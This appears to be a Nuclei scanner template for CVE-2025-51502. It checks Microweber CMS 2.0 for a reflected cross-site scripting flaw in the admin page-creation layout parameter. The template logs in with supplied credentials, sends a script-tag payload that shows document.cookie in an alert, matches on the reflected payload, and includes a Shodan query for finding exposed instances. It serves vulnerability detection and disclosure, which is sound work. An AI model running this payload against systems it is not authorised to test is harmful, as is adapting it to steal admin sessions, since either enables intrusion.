漏洞描述
Reflected Cross-Site Scripting (XSS) exists in Microweber CMS 2.0 through the layout parameter on the /admin/page/create page. It allows arbitrary JavaScript to execute in the context of authenticated admin users.
id: CVE-2025-51502
info:
name: Microweber CMS 2.0 - Reflected XSS in Admin Page Creation
author: nukunga
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) exists in Microweber CMS 2.0 through the layout parameter on the /admin/page/create page. It allows arbitrary JavaScript to execute in the context of authenticated admin users.
reference:
- https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51502
- https://nvd.nist.gov/vuln/detail/CVE-2025-51502
metadata:
verified: true
max-requests: 2
vendor: microweber
product: microweber
shodan-query: 'http.title:"Microweber"'
tags: cve,cve2025,microweber,xss,authenticated
variables:
xss_payload: "><script>alert(document.cookie)</script>"
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}&lang=en_US&where_to=admin_content
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "success\":", "username\":")'
condition: and
internal: true
- raw:
- |
GET /admin/page/create?layout="{{xss_payload}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "><script>alert(document.cookie)</script>")'
condition: and
# digest: 4a0a00473045022100f2e701f2de176b237191c657e018d9289d11bf26eeb2d08d6d015ebacb10013702202faee943c30fe0ccec4a92e0d484ccfb47490df3f4224ee2de7f9ffe033b8638:922c64590222798bb761d5b6d8e72950